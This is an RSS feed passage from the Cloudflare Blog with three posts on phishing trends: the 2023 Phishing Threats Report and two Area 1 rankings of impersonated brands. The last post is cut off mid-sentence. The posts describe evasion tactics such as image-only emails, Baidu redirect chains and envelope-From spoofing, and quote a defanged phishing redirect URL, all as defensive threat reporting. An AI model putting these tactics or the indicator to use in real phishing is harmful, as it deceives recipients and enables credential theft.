
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Thu, 09 Apr 2026 20:34:36 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Introducing Cloudflare's 2023 phishing threats report]]></title>
            <link>https://blog.cloudflare.com/2023-phishing-report/</link>
            <pubDate>Wed, 16 Aug 2023 09:13:17 GMT</pubDate>
            <description><![CDATA[ The 2023 Phishing Threats Report analyzes millions of malicious emails, brand impersonation examples, identity deception and other key attack trends based on email security data from a 12-month period ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4zKdGorR5BXoIDN9iE1c2y/ef2bc7e7b92d5b73dd48caba515210bb/Introducing-Cloudflare-2023-phishing-threats-report-1.png" />
            
            </figure><p>After shutting down a ‘phishing-as-a-service’ operation that impacted thousands of victims in 43 countries, INTERPOL recently <a href="https://www.interpol.int/en/News-and-Events/News/2023/Notorious-phishing-platform-shut-down-arrests-in-international-police-operation?">noted</a>, “Cyberattacks such as phishing may be borderless and virtual in nature, but their impact on victims is real and devastating.” Business email compromise (<a href="https://www.cloudflare.com/learning/email-security/business-email-compromise-bec/">BEC</a>), a type of malware-less attack that tricks recipients into transferring funds — for example — has <a href="https://www.ic3.gov/Media/Y2023/PSA230609">cost</a> victims worldwide more than $50 billion, according to the FBI.</p><p>It is estimated that 90% of successful cyber attacks <a href="https://www.cisa.gov/shields-guidance-families">start</a> with email <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/">phishing</a>, which continues to be very lucrative for attackers. There is not much today that can be done to stop phishing <i>attempts</i>. However, to <a href="https://www.cloudflare.com/learning/email-security/how-to-prevent-phishing/">prevent <i>successful</i> attacks</a>, it is important to understand (and proactively address) evolving phishing trends — including the ways attackers cleverly exploit intended victims’ trust in “known” email senders. To that end, this week Cloudflare published its first <a href="https://www.cloudflare.com/lp/2023-phishing-report/">Phishing Threats Report</a>.</p><p>This report explores key phishing trends and related recommendations, based on <a href="https://www.cloudflare.com/zero-trust/products/email-security/">email security</a> data from May 2022 to May 2023. During that time, Cloudflare <b>processed approximately 13 billion emails</b>, which included blocking approximately <b>250 million malicious messages</b> from reaching customers’ inboxes. The report is also informed by a Cloudflare-commissioned <b>survey of 316 security decision-makers</b> across North America, EMEA, and APAC (you can download that separate study <a href="https://www.cloudflare.com/lp/zero-trust-to-combat-multichannel-phishing/">here</a>).</p><p>Check out the full report to understand our three key takeaways:</p><ul><li><p><b>Attackers using deceptive links as the #1 phishing tactic</b> — and how they are evolving how they get you to click and when they weaponize the link;</p></li><li><p><b>Identity deception</b> takes multiple forms (including business email compromise (BEC) and brand impersonation), <b>and can easily bypass email authentication standards;</b></p></li><li><p>Attackers pretend to be hundreds of different organizations, but they <b>primarily impersonate the entities we trust</b> and need to get work done.</p></li></ul><p>Here are a few other things to keep in mind as you read the 2023 Phishing Threats report.</p>
    <div>
      <h3>Email threat categorization</h3>
      <a href="#email-threat-categorization">
        
      </a>
    </div>
    <p>Attackers typically use a combination of <a href="https://www.cloudflare.com/learning/security/threats/social-engineering-attack/">social engineering</a> and technical obfuscation techniques to make their messages seem legitimate. Therefore, Cloudflare uses a number of advanced detection techniques to analyze “fuzzy” signals (not just content that’s visible to the naked eye) to identify unwanted emails. Those signals include:</p><ul><li><p><b>Structural analysis</b> of headers, body copy, images, links, attachments, payloads, and more, using heuristics and <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">machine learning models</a> specifically designed for phishing signals;</p></li><li><p><b>Sentiment analysis</b> to detect changes in patterns and behaviors (e.g., writing patterns and expressions);</p></li><li><p><b>Trust graphs</b> that evaluate partner social graphs, email sending history, and potential partner impersonations</p></li></ul><p>Our <a href="https://www.cloudflare.com/zero-trust/solutions/email-security-services/">email security service</a> also incorporates <a href="https://www.cloudflare.com/learning/security/glossary/threat-intelligence-feed/">threat intelligence</a> from Cloudflare’s global network, which blocks an average of 140 billion cyber threats each day.</p><p>Those and many other signals lead to email dispositions of malicious, BEC, spoof, or spam; our dashboard tells customers the specific reasons (i.e., the threat indicator ‘categories’) for a particular email disposition.</p><p>Below is a snapshot of the top email threat indicators we observed between May 2, 2022, to May 2, 2023. We categorize threat indicators into more than 30 different categories; over that period, the top threat indicators included <b>deceptive links</b>, <b>domain age</b> (newly registered domains), <b>identity deception</b>, <b>credential harvesting</b>, and <b>brand impersonation</b>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/JfZOoAKRayGTRMdjkwQOn/502f97161f6cdd8ba4614e299e5f6fc9/image4-6.png" />
            
            </figure><p>Below are brief descriptions of each of the top categories (detailed in more depth in the report’s appendix).</p><p>If clicked, a <b>deceptive link</b> will open the user’s default web browser and render the data referenced in the link, or open an application directly (e.g. a PDF). Since the display text for a link (i.e., hypertext) in HTML can be arbitrarily set, attackers can make a URL appear as if it links to a benign site when, in fact, it is actually malicious.</p><p><b>Domain age</b> is related to domain reputation, which is the overall score assigned to a domain.  For example, domains that send out numerous new emails immediately after domain registration will tend to have a poorer reputation, and thus a lower score.</p><p><b>Identity deception</b> occurs when an attacker or someone with malicious intent sends an email claiming to be someone else. The mechanisms and tactics of this vary widely. Some tactics include registering domains that look similar (aka domain impersonation), are spoofed, or use display name tricks to appear to be sourced from a trusted domain. Other variations include sending email using domain fronting and high-reputation web services platforms.</p><p><b>Credential harvesters</b> are set up by an attacker to deceive users into providing their login credentials. Unwitting users may enter their credentials, ultimately providing attackers with access to their accounts.</p><p><b>Brand impersonation</b> is a form of identity deception where an attacker sends a phishing message that impersonates a recognizable company or brand. Brand impersonation is conducted using a wide range of techniques.</p><p>An <b>attachment</b> to an email that, when opened or executed in the context of an attack, includes a call-to-action (e.g. lures target to click a link) or performs a series of actions set by an attacker.</p><p>Cloudflare regularly observes multiple threat indicators in one phishing email. For example, one Silicon Valley Bank-themed phishing campaign (detailed in <a href="/how-sophisticated-scammers-and-phishers-are-preying-on-customers-of-silicon-valley-bank/">this</a> March 2023 blog) combined <i>brand impersonation</i> with a <i>deceptive link</i> and <i>malicious attachment</i>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4uyngezMfEcC6gf784nyV6/225bc53f509017a05329698ccea01c74/image3-5.png" />
            
            </figure><p>The attackers leveraged the SVB brand in a DocuSign-themed template. The email included HTML code that contains an initial link and a complex redirect chain that is four deep. The included HTML file in the attack would have sent the recipient to a WordPress instance that has recursive redirection capability.</p><p>(Speaking of links, deceptive links were the <b>#1 threat category,</b> appearing in <b>35.6% of our detections</b>. And attackers aren’t just using links in email channels; the rise of multi-channel phishing threats — which exploit other applications such as SMS/text, chat, and social media — are also covered in the report).</p>
    <div>
      <h3>Trusted (and most impersonated) brands</h3>
      <a href="#trusted-and-most-impersonated-brands">
        
      </a>
    </div>
    <p>Silicon Valley Bank was just one of <b>approximately 1,000 different brands</b> we observed being impersonated in emails targeting Cloudflare customers between May 2022 and May 2023. (Cloudflare employees were directly targeted via brand impersonation in the “Oktapus” phishing attack that the <a href="https://www.cloudflare.com/cloudflare-one/">Cloudflare One</a> suite of products <a href="/2022-07-sms-phishing-attacks/">thwarted</a> in July 2022).</p><p>However, as detailed in the Phishing Threats Report, we observed that email attackers most often (51.7% of the time) impersonated one of 20 well-known global brands, with <b>Microsoft</b> being #1 on their list.</p>
<table>
<thead>
  <tr>
    <th><span>Rank</span></th>
    <th><span>Impersonated brand</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>1</span></td>
    <td><span>Microsoft</span></td>
  </tr>
  <tr>
    <td><span>2</span></td>
    <td><span>World Health Organization</span></td>
  </tr>
  <tr>
    <td><span>3</span></td>
    <td><span>Google</span></td>
  </tr>
  <tr>
    <td><span>4</span></td>
    <td><span>SpaceX</span></td>
  </tr>
  <tr>
    <td><span>5</span></td>
    <td><span>Salesforce</span></td>
  </tr>
  <tr>
    <td><span>6</span></td>
    <td><span>Apple</span></td>
  </tr>
  <tr>
    <td><span>7</span></td>
    <td><span>Amazon</span></td>
  </tr>
  <tr>
    <td><span>8</span></td>
    <td><span>T-Mobile</span></td>
  </tr>
  <tr>
    <td><span>9</span></td>
    <td><span>YouTube</span></td>
  </tr>
  <tr>
    <td><span>10</span></td>
    <td><span>MasterCard</span></td>
  </tr>
  <tr>
    <td><span>11</span></td>
    <td><span>Notion.so</span></td>
  </tr>
  <tr>
    <td><span>12</span></td>
    <td><span>Comcast</span></td>
  </tr>
  <tr>
    <td><span>13</span></td>
    <td><span>Line Pay</span></td>
  </tr>
  <tr>
    <td><span>14</span></td>
    <td><span>MasterClass</span></td>
  </tr>
  <tr>
    <td><span>15</span></td>
    <td><span>Box</span></td>
  </tr>
  <tr>
    <td><span>16</span></td>
    <td><span>Truist Financial Corp</span></td>
  </tr>
  <tr>
    <td><span>17</span></td>
    <td><span>Facebook</span></td>
  </tr>
  <tr>
    <td><span>18</span></td>
    <td><span>Instagram</span></td>
  </tr>
  <tr>
    <td><span>19</span></td>
    <td><span>AT&amp;T</span></td>
  </tr>
  <tr>
    <td><span>20</span></td>
    <td><span>Louis Vuitton</span></td>
  </tr>
</tbody>
</table>
    <div>
      <h3>Example of a Microsoft credential harvesting attempt</h3>
      <a href="#example-of-a-microsoft-credential-harvesting-attempt">
        
      </a>
    </div>
    <p>Earlier this year, Cloudflare detected and blocked a phishing campaign leveraging the Microsoft brand in an attempt to harvest credentials through a legitimate — but compromised — site.</p><p>In the email example below, there is no text in the body of the email despite its appearance. The entire body is a hyperlinked JPEG image. Thus, if the recipient clicks anywhere in the body (even if they don’t intend to click the link), they are effectively clicking the link.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7awKbnZvPkxboytqFmUaGl/7506202a224e5b3ee8736074d7d7e7d0/image1-16.png" />
            
            </figure><p>Initially, the hyperlink for this image appears to be a benign Baidu URL - hxxp://www.baidu[.]com/link?url=-yee3T9X9U41UHUa3VV6lx1j5eX2EoI6XpZqfDgDcf-2NYQ8RVpOn5OYkDTuk8Wg#&lt;recipient’s email address base64 encoded&gt;.  However, if this link is clicked, the target’s browser would be redirected to a site that had been compromised and used to host a credential harvester.</p><p>The attacker used Microsoft Office 365 branding, but attempted to circumvent any brand detection techniques by including the brand information within the image (i.e., there was no plaintext or HTML text that could be inspected to identify the brand).</p><p>However, using optical character recognition (OCR), Cloudflare successfully identified “Office 365” and “Microsoft” in the image. Using OCR, we also identified the use of suspicious account lures related to passwords.</p><p>In this example, attackers’ techniques included:</p><ul><li><p>Inclusion of only a JPEG image (impossible to detect words without OCR)</p></li><li><p>Embedding a hyperlink in that image (clicking anywhere in the body would result in clicking the link)</p></li><li><p>Hyperlinking to a Baidu URL (used to bypass reputation-based URL detection techniques)</p></li><li><p>The Baidu URL redirecting the recipient’s browser to a credential harvesting site (i.e., would circumvent other email security defenses that are not capable of deep link inspection)</p></li><li><p>Hosting the credential harvester on a legitimate site that had been compromised by the attacker (even with deep link inspection, will again attempt to bypass URL detection techniques based on reputation)</p></li></ul><p>This attack vector leverages the high reputation and authenticity of Baidu to bypass the reputation of the true host/IP where the credential harvester is hosted.</p><p>While this specific campaign focused on harvesting Microsoft credentials, we often see attackers using similar methods to bypass brand detection techniques and trick victims into downloading <a href="https://www.cloudflare.com/learning/ddos/glossary/malware/">malware</a> and other <a href="https://www.cloudflare.com/learning/security/glossary/malicious-payload/">malicious payloads</a>.</p><p>URL redirection techniques are often seen in phishing campaigns, but threat actors are continuing to refine their approach by abusing more and more legitimate domains like <a href="http://baidu.com">baidu.com</a>, <a href="http://bing.com">bing.com</a>, <a href="http://goo.gl">goo.gl</a>, etc. Our numerous detection capabilities allow us to conduct deep link inspection of URLs using redirection techniques of all kinds, including those that abuse legitimate domains.</p>
    <div>
      <h3>What about SPF, DKIM, and DMARC?</h3>
      <a href="#what-about-spf-dkim-and-dmarc">
        
      </a>
    </div>
    <p>Email authentication (specifically the <a href="https://www.cloudflare.com/learning/email-security/dmarc-dkim-spf/">SPF, DKIM, and DMARC</a> standards) are often mentioned as useful against brand impersonation: these standards help validate server and tenant origins, protect message integrity, provide policy enforcement, and more.</p><p>However, attackers can still find ways to bypass authentication to trick email suites; and we actually observed that <b>89% of unwanted messages “passed”</b> SPF, DKIM, and/or DMARC checks.</p><p>Some limitations of email authentication include:</p>
<table>
<thead>
  <tr>
    <th><span>SPF  </span><br /><span>(Sender Policy Framework)</span></th>
    <th><span>Key benefits:</span><br /><span>Validating server origin (i.e., validates where a message originates from)</span><br /><span>Defining which email servers and services are allowed to send messages on a domain owner’s behalf</span></th>
  </tr>
  <tr>
    <th><span>Limitations:</span><br /><span>Does not prevent lookalike email, domain, or display name </span><a href="https://www.cloudflare.com/learning/ssl/what-is-domain-spoofing/"><span>spoofing</span></a><br /><span>Does not validate the “From” header; uses envelope “From” to determine sending domain</span><br /><span>Validation ineffective when emails are forwarded or when messages sent to a mailing list are sent to each subscriber </span><br /><span>SPF evaluation process can be limited to a certain number of </span><a href="https://www.cloudflare.com/learning/dns/what-is-dns/"><span>DNS</span></a><span> lookups</span><br /><span>Does not protect against attacks using “validated” emails with embedded URLs, </span><a href="https://www.cloudflare.com/learning/security/glossary/malicious-payload/"><span>malicious payloads</span></a><span>, or attachments</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>DKIM </span><br /><span>(Domain Keys Identified Mail)</span></td>
    <td><span>Key benefits:</span><br /><span>Providing tenant origin validation (i.e., checks that an email was sent/authorized by the owner of the domain via a digital signature)</span><br /><span>Ensuring email is not altered while transferred from server to server; protecting message integrity</span></td>
  </tr>
  <tr>
    <td><span>Limitations:</span><br /><span>Does not prevent lookalike email, domain, or display name spoofing</span><br /><span>Does not protect against </span><a href="https://developers.cloudflare.com/magic-wan/reference/anti-replay-protection/"><span>replay attacks</span></a><span> (DKIM only signs specific parts of a message. Attackers can add other header fields to emails passing DKIM then forward them.)</span><br /><span>Does not protect against attacks using “validated” emails with embedded URLs, malicious payloads or attachments</span></td>
  </tr>
  <tr>
    <td><span>DMARC (Domain-based Message Authentication, Reporting and Conformance)</span></td>
    <td><span>Key benefits:</span><br /><span>Providing policy enforcement and reporting for SPF and DKIM</span><br /><span>Stipulating what policy to follow if an email doesn’t pass SPF or DKIM authentication (e.g. reject/delete, quarantine, no policy/send)</span><br /><span>Reporting function allows domain owners to see who is sending email on their behalf (i.e., protecting against spoofing of your own domain and brand abuse)</span></td>
  </tr>
  <tr>
    <td><span>Limitations: </span><br /><span>Does not prevent spoofing of another brand’s domain</span><br /><span>Does not prevent lookalike email, domain, or display name spoofing</span><br /><span>Domain owners specify what percentage of mail DMARC policies it applies to; application percentages of less than 100% are less effective</span><br /><span>Does not protect against attacks using “validated” emails with embedded URLs, malicious payloads or attachments</span></td>
  </tr>
</tbody>
</table>
    <div>
      <h3>Conclusions</h3>
      <a href="#conclusions">
        
      </a>
    </div>
    <p>Attackers are constantly evolving their tactics. Multiple protection layers must be enacted before, during, and after messages reach the inbox. Cloudflare never inherently “trusts” any type of email communication (whether it appears to be internal, external, or from a ‘known’ business partner).</p><p>Likewise, we recommend that — first and foremost — all organizations extend the <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust security model</a> of “never trust, always verify” not just to the network and applications, but also to the email inbox.</p><p>In addition to <a href="https://www.cloudflare.com/zero-trust/products/email-security/">securing email</a> with a Zero Trust approach, we also recommend:</p><ul><li><p><b>Augmenting cloud email with multiple anti-phishing controls.</b> As noted in <a href="https://www.forrester.com/blogs/announcing-the-forrester-wave-enterprise-email-security-q2-2023/">this</a> Forrester blog from June, <i>“The use of messaging, collaboration, file sharing, and enterprise software-as-a-service applications across multiple devices all contribute to employee productivity and experience. Many of these environments are considered ‘closed,’ but one successful phish of a supply chain partner’s credentials opens your organization up to data loss, credential theft, fraud, and ransomware attacks. Protections developed for the email inbox must extend to these environments and throughout the day-to-day workflows of your employees.”</i></p></li><li><p><b>Adopting phishing-resistant multifactor authentication (</b><a href="https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/"><b>MFA</b></a><b>).</b> While not all MFA provides the same layer of security, hardware security keys are among the most secure authentication methods for <a href="/how-cloudflare-implemented-fido2-and-zero-trust/">preventing successful phishing attacks</a>. They can protect networks even if attackers gain access to usernames and passwords.</p></li><li><p><b>Make it harder for humans to make mistakes.</b>  Meet employees and teams where they are by making the tools they already use more secure, and preventing them from making mistakes. For example, remote browser isolation (<a href="https://www.cloudflare.com/learning/access-management/what-is-browser-isolation/">RBI</a>) technology, when integrated with <a href="https://www.cloudflare.com/learning/email-security/what-is-email-security/">cloud email security</a>, can automatically isolate suspicious email links to prevent users from being exposed to potentially malicious web content. Keyboard inputs can also be disabled on untrusted websites, protecting users from accidentally entering sensitive information within a form fill or credential harvesting. This provides a layer of defense against multi-channel phishing attacks by effectively allowing users to safely open links without disrupting their workflow.</p></li></ul><p>If you’re interested in the full findings, you can download the 2023 Phishing Threats Report <a href="https://www.cloudflare.com/lp/2023-phishing-report/">here</a>, as well as our recommendations for preventing successful phishing attacks. And if you’d like to see Cloudflare’s email security in action, you can request a free phishing risk assessment <a href="https://www.cloudflare.com/lp/emailsecurity/">here</a>.</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <guid isPermaLink="false">5r8tVebXSz3ESgfdLHjC7X</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
            <dc:creator>Juliette Cash</dc:creator>
        </item>
        <item>
            <title><![CDATA[Area 1 Security Announces the Most Spoofed Brand of 2021: WHO is Back Again?]]></title>
            <link>https://blog.cloudflare.com/2022-march-hackness-who-phished-brand/</link>
            <pubDate>Thu, 31 Mar 2022 12:34:00 GMT</pubDate>
            <description><![CDATA[ From Jan. 2021 to Jan. 2022, more than 8.5 million (of 56 million in total) brand phishing emails blocked by Area 1 impersonated the World Health Organization ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in March 2022 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>Dear America’s sports-loving, company-securing fans: Before you find yourself glued this weekend to (what some call) <b>THE biggest game</b> in college basketball history, we are here to crown the 2022 March Hackness winner!</p><p>Also known as: the organization most impersonated by attackers in phishing campaigns in 2021.</p><p>Despite the shiny crop of newcomers to the Top 64 impersonated organizations (which included <b>Notion.so</b>, <b>Binance</b>, and grocery stores from <b>Costco</b> to <b>Kwik Shop</b>), our March Hackness “Final Four” ended up mirroring the 2022’s NCAA Men’s Final Four: with the <a href="https://www.usatoday.com/story/sports/ncaab/2022/03/27/kansas-bill-self-fourth-final-four-winners-losers-miami/7185222001/">blue blood</a> brands, that is.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1W1YsrZ38ES3VfT9k690du/b048e2d457f4fe0b20b7b072e04cb705/March-Hackness_Final_2-1.png" />
            
            </figure><p>That’s right, folks: on the heels of passing enduring the second year of the COVID-19 pandemic, the <b>World Health Organization</b> beat out <b>Amazon, Microsoft</b> and <b>T-Mobile</b> to become the back-to-back <b>winner of Area 1’s “ophishal” March Hackness title</b>!</p><p>From Jan. 2021 to Jan. 2022, a whopping <b>15% (over 8.5 million) of the 56 million brand phishing emails</b> blocked by Area 1 impersonated the WHO.</p><p>This timeframe (not coincidentally) matches the WHO remaining top of mind for global businesses closely monitoring the rollout of new vaccines and booster shots, as well as the rise of the Delta and Omicron variants.</p>
    <div>
      <h3>There’s Always Next Year’s Tournament…</h3>
      <a href="#theres-always-next-years-tournament">
        
      </a>
    </div>
    <p>The pandemic also influenced brand phishing in other ways. The “blue blood” of online retail and the cloud — and our March Hackness runner-up — <b>Amazon</b>, was impersonated in <b>over 3.2 million phishing</b> emails blocked by Area 1.</p><p>The focus of <a href="https://www.rd.com/article/amazon-email-scam/">Amazon scams</a> vary. However, as Area 1’s principal threat researcher, Juliette Cash, explains, common ones include phishing emails claiming that accounts have been ‘placed on hold,’ payments have been declined or that Prime memberships have ‘expired.’</p><p>These types of attacks utilize Amazon branding to impersonate official emails and entice victims to click links to update their credit card information. Once the link is clicked, the user’s browser will upload malicious content and direct them to verify their identity and input their payment details.</p><p>While these messages can be sent at any time, we’ve found that they are commonly tied to events, such as Amazon Prime Day, that trigger individuals to take action in fear of missing out.</p><p>By the way, although Amazon vs. the WHO isn’t exactly the epic and storied rivalry of Duke vs. UNC, Amazon has been in our list of top 64 most impersonated brands ever since March Hackness’ inception … so, we’ll count this matchup as an important piece of cybersecurity history!</p><p>Now, we have no idea what it’s like pretending to be a Blue Devil or Tar Heel (or Jayhawk or Wildcat) for a basketball season, but we do know some things about bad actors’ impersonation tactics.</p><p><b>Identity deception</b> using tactics like spoofing, domain impersonation and display name impersonation showcase the ease at which people can deceive the user through brand phishing to gain access to their goals.</p><p>In many cases, it’s as simple as a display name change. However, there are (of course) much more complex phishing techniques that will evade standard defenses.</p><p>For example, in <a href="https://www.area1security.com/blog/pfizer-vaccine-phishing-campaign/">this 2021 vaccine phishing campaign</a> (which originally bypassed Microsoft Office 365’s native defenses before it was blocked by Area 1), attackers pretending to be the CDC:</p><ul><li><p>Used Display Name Spoofing to fake the visible FROM header</p></li><li><p>Inserted an SMTP HELO command to spoof the Envelope From domain</p></li><li><p>Chose to spoof a domain that did not have email authentication protocols configured and that no longer resolved to an IP address</p></li><li><p>Compromised a legitimate host with a benign IP, and used it to launch their phishing attack</p></li></ul><p><i>That’s</i> what you call a playbook.</p><p>And speaking of <b>Microsoft</b>, it made our “Final Four” of most-phished brands for the fourth consecutive year.</p><p>Attackers not only frequently impersonate individual Microsoft tools, they also often use Microsoft’s own tools and branding to bypass legacy defenses and email authentication. (Just one example: this credential harvesting campaign specifically leveraged Microsoft SharePoint and Microsoft Planner).</p>
    <div>
      <h3>So, How Do <i>You</i> Guard Your Inbox?</h3>
      <a href="#so-how-do-you-guard-your-inbox">
        
      </a>
    </div>
    <p>The bottom line is this: Attackers know how to deliver brand phishing campaigns with techniques that evade native email defenses, email authentication and sender reputation tools (i.e., DMARC, SPF and DKIM).</p><p>But – they’re not particularly clever or unique about whom they impersonate. As you can see from our March Hackness findings, <b>just 25 organizations were used in the majority (57%) of these phishing emails.</b></p><p>There are three main reasons brand phishing continues to reach many organizations’ inboxes, year after year:</p><ul><li><p><b>It’s easy</b> for attackers to establish <a href="https://www.cloudflare.com/learning/ssl/what-is-domain-spoofing/">new phishing domains</a> that exploit trusted infrastructure.</p></li><li><p><b>It’s fast</b> for attackers to set up DMARC, SPF and DKIM policies for new phishing domains to reach inboxes.</p></li><li><p><b>People trust</b> emails from known organizations, business partners and internal employee accounts – accounts that they won’t identify as compromised unless they have more [advanced email security](more advanced email security in place) in place.</p></li></ul><p>You can learn more about what the common email authentication standards (SPF, DKIM and DMARC) can and cannot do when it comes to correctly verifying the origins of emails (and who they claim to be from), here.</p><p>But what does work better than email authentication for <a href="https://www.cloudflare.com/learning/email-security/how-to-prevent-phishing/">preventing these kinds of phishing attacks</a>? <b>Advanced detection techniques.</b></p><p>For example, Area 1’s preemptive technology uses massive-scale web crawling to reveal emergent campaign infrastructure. Our small pattern analytics also identify phishing attack infrastructure, patterns of attack formation and threats within datasets that help us spot cyber campaigns as they’re being built.</p><p>To <b>see which brand phishing emails are landing in your organization’s inbox</b> (whether it’s from one of the March Hackness ‘players,’ or one of the 800-plus other brands hackers spoof), request a <b>free Phishing Risk Assessment</b> <a href="https://www.cloudflare.com/lp/emailsecurity/"><b>here</b></a><b>.</b></p><p>And, in the  meantime, we hope you all enjoy the last of 2022 March Madness. We know we at Area 1 will!</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Spoofing]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <guid isPermaLink="false">7zeIWQjLftRpiY3wTtnxk</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[2022 March Hackness: The Return of the Phishing Bracket - What 56 Million Emails Reveal about the Most Impersonated Brands]]></title>
            <link>https://blog.cloudflare.com/2022-march-hackness-phishing-bracket/</link>
            <pubDate>Sat, 26 Mar 2022 15:44:00 GMT</pubDate>
            <description><![CDATA[ Learn who made the list of the top brands that attackers use in phishing lures. This bracket is based on an analysis of more than 56 million phishing emails blocked by Area 1’s solution in the preceding 12 months since Feb 2022.  ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in March 2022 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p><i>Area 1 Security’s </i><b><i>Sixth Annual March Hackness: The Perfect Phishing Bracket</i></b><i> is here!</i></p><p><i>Learn who made the list of the top brands that attackers use in phishing lures. This bracket is based on an analysis of more than 56 million phishing emails blocked by Area 1’s solution in the preceding 12 months since Feb 2022. Like with the real tournament, there are some surprising Cinderella-like newcomers, well-known MVPs, and 800-plus spoofed organizations in between — but overall, 77% of all phishing attacks exploited just the Top 64 brands in our bracket, below.</i></p><p>Well, it’s that time of the year when NCAA basketball fans find themselves bemoaning broken brackets** and pondering life’s biggest questions, such as:</p><ul><li><p>How did the Wildcat men and women both lose in the first rounds?</p></li><li><p>Was Baylor’s exit scientific proof that all good things really must come to an end?</p></li><li><p>DID ALL THAT JUST REALLY HAPPEN?!</p></li><li><p>What if the referees didn’t [insert your adjectives of choice here]?</p></li></ul><p>**A heartbroken RIP to my unsuccessful pick-to-win-it-all, Gonzaga. Goodbye, Bulldogs, we barely knew you.</p><p>Now, the Area 1 Security folks can only offer some unscientific opinions to the questions above. After all, our job is to prevent breaches, not prognosticate about bad <a href="https://www.sbnation.com/college-basketball/2022/3/19/22986648/north-carolina-vs-baylor-march-madness-refs-video-brady-manek-ejection">perfectly fine</a> officiating.</p><p>Which means that, unlike the “sometimes it’s just luck” nature of college basketball in March, we prefer to look at cold, hard data to answer threat trend questions.</p><p>And that brings us to — DRUM ROLL PLEASE — the introduction of our <b>Sixth Annual March Hackness: The Perfect Phishing Bracket!</b></p><p>This is the time of year we conclusively answer: <b>Which organizations do attackers impersonate most in phishing campaigns?</b></p><p>For 2022, our analysis is based on <b>more than 56 million phishing emails</b> that we intercepted from January 2021 – January 2022. And although attackers pretended to be <b>over 800 different organizations</b>, ultimately, just <b>64 organizations were the go-to lures in a whopping 77%</b> of these brand phishing attempts:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3r90T4rUd0iN28GKqtttps/323e8c273a16e2747df5bc1267b81b7d/image1-25.png" />
            
            </figure>
    <div>
      <h3>Breaking Down the Bracket</h3>
      <a href="#breaking-down-the-bracket">
        
      </a>
    </div>
    <p>Now, we’ll reveal soon who was MOST impersonated, but let’s break down our Top 64 (and other initial findings from the overall data), below.</p><p>As always, attackers continued to take advantage of the following two, basic concepts when it comes to brand phishing campaigns (which, PS: easily evade DMARC and other email authentication standards):</p><p><b>1) Which technologies do people use most?</b>In Area 1’s first-ever March Hackness, we found hackers often exploited “traditional” banks and financial institutions, and loved to spoof the likes of AOL, Yahoo!, and Craigslist. But that was in 2016, when AOL’s AIM was still around (!!), before Facebook Marketplace launched as ‘the new’ Craigslist … and before something mysterious called Crypto.com rebranded the Staples Center.</p><p>Flash forward to today, and:</p><ul><li><p>In a sign of the times, and acknowledgement of how much <b>‘the Cloud’</b> is a part of all of our lives**, more than 22%** of brand phishing attacks exploited commonly <b>cloud services</b>, such as <b>Amazon, Box, DocuSign, Google, Intuit, Microsoft</b> and many others.</p></li><li><p>But, it isn’t just well-entrenched cloud companies on the list: <a href="https://www.theverge.com/2021/1/5/22215782/tiktok-notion-enterprise-software-teen-studyblr">viral-because-of-TikTok</a> <b>Notion.so,</b> the productivity tool that’s won over high schoolers and The Wall Street Journal, appeared for the first time in our Top 64!</p></li><li><p>Hackers are seeing dollar signs in cryptocurrency: <b>Binance</b> is a March Hackness newcomer (perhaps the Saint Peter’s of surprising suspect emails??!) this year. And although they didn’t crack the Top 64, <b>Coinbase</b>, <b>Metamask</b>, <b>Kraken</b>, <b>Gemini</b> and multiple crypto exchanges were also spoofed in thousands of phishing emails.</p></li><li><p>By the way, <b>Bitcoin</b>, which doesn’t technically qualify as an organization for our bracket, still deserves its own special shot-out: hackers referenced Bitcoin in <b>over 600,000</b> phishing emails last year. Actually, let’s just assume now that <a href="https://www.protocol.com/bulletins/circle-blockfi-pantera-hacked?">the crypto phishing trend</a> has only one direction to go.</p></li></ul><p><b>2) Which brands do people trust?</b>Attackers know users are more inclined to open and click messages from organizations that they interact with, whether it’s for information, work or play.</p><p>In addition to leveraging the <a href="https://www.cloudflare.com/products/zero-trust/remote-workforces/">hybrid/remote workforce</a> trend to phish users using popular cloud services, attackers also pretended to be:</p><ul><li><p><b>Healthcare &amp; Social Services:</b> With the 